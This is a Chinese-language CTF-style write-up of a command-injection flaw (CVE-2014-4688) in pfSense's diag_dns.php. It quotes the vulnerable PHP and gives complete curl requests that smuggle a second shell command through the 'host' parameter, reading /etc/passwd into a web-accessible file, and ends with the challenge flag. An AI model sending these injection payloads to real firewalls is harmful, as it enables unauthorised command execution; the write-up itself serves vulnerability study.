0x0 漏洞信息
- pfsense是一个开源的商业化防火墙,历史悠久,用户众多
- cve编号为:CVE-2014-4688,参考链接
- 网上关于这个漏洞的解释都含含糊糊,甚至都没测试就发出来了
- 本文基于真实环境安装测试
0x1 漏洞成因
- 利用提供的iso完成安装,提取出目标页面
diag_dns.php
/* Cheap hack to support both $_GET and $_POST */
if ($_GET['host'])
$_POST = $_GET;
if($_GET['createalias'] == "true") {
$host = trim($_POST['host']);
if($_GET['override'])
$override = true;
$a_aliases = &$config['aliases']['alias'];
$type = "hostname";
$resolved = gethostbyname($host);
if($resolved) {
$host = trim($_POST['host']);
$dig=`dig "$host" A | grep "$host" | grep -v ";" | awk '{ print 5 }'`;
- 这里的
$_POST['host']
直接传递给dig xxx
执行,属于命令注入
0x2 漏洞利用
首先在chrome中按照标准使用一遍这个功能
这时候通过bp或者curl来模拟/拦截请求
curl 'http://1.2.3.4:8080/diag_dns.php' \ -H 'Connection: keep-alive' \ -H 'Pragma: no-cache' \ -H 'Cache-Control: no-cache' \ -H 'Origin: http://1.2.3.4:8080' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'DNT: 1' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \ -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \ --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1.2.3.4&Submit=DNS+Lookup' \ --compressed \ --insecure
紧接着,增加get路径,并且对host参数进行注入,核心参数如下
curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true'
&host=1";md5 /etc/passwd >pick.txt;&
修改后的请求如下
curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true' \ -H 'Connection: keep-alive' \ -H 'Pragma: no-cache' \ -H 'Cache-Control: no-cache' \ -H 'Origin: http://1.2.3.4:8080' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'DNT: 1' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \ -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \ --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1";md5 /etc/passwd >pick.txt;&Submit=DNS+Lookup' \ --compressed \ --insecure
最后通过浏览器访问
pick.txt
就可以获得命令执行的结果- 根据题目要求flag为:
flag{0ca0c0336fc307ab3d7fcc3e33590d41}